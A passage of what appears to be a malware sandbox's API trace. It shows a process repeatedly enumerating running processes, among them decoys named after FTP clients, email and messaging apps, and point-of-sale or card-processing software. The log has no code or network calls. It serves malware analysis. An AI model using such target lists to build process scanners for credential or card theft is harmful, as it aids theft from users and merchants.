lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0227.640] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0227.642] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0227.644] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0227.645] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0227.654] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0227.656] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0227.657] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0227.659] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0227.661] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0227.663] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0227.665] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0227.666] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0227.668] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0227.672] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0227.674] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0227.676] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0227.678] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0227.680] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0227.681] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0227.686] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0227.687] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0227.689] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0227.691] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0227.693] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0227.694] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0227.696] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0227.697] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0227.736] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0227.738] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0227.740] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0227.741] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0227.743] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0227.745] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0227.750] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0227.752] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0227.754] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0227.756] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0227.757] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0227.759] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0227.760] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0227.768] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0227.771] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0227.773] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0227.775] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0227.828] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0227.829] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0227.831] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0227.833] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0227.834] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0227.836] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0227.837] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0227.841] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0227.843] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0227.844] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0227.846] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0227.848] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0227.849] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0227.851] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0227.852] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0227.853] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0227.859] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0227.861] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0227.863] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0227.865] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0227.875] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0227.877] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0227.879] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0227.881] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0227.883] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0227.884] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0227.890] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0227.892] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0227.894] CloseHandle (hObject=0x2278) returned 1 [0227.894] Sleep (dwMilliseconds=0x64) [0228.055] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0228.095] Process32First (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.097] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0228.098] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0228.100] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.102] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0228.104] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.106] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0228.108] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0228.110] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0228.111] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.113] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, 